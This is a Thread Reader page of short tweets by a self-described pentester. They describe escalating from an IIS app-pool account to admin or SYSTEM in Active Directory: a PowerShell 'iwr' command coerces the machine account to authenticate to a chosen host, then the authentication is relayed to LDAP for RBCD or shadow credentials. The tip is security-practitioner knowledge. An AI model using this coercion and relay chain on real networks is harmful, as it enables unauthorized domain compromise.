Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
Mayfly Profile picture
Mayfly
@M4yFly
Former Dev and DevOps| Pentester and red teamer at orange cyberdefense | OSCE³| Tweet are my own| discord: m4yfly
Jan 11, 2024 4 tweets 2 min read
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?

Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵 Image than relay to Ldap and :
- start_tls + add a computer to the domain + RBCD
or
- shadow credentials

Example with RBCD : Image
Dec 14, 2022 7 tweets 3 min read
The answer is not simple ^^ a small thread 🧵
So you have genericAll on the Users container.
The first thing to do is check the inheritance. Image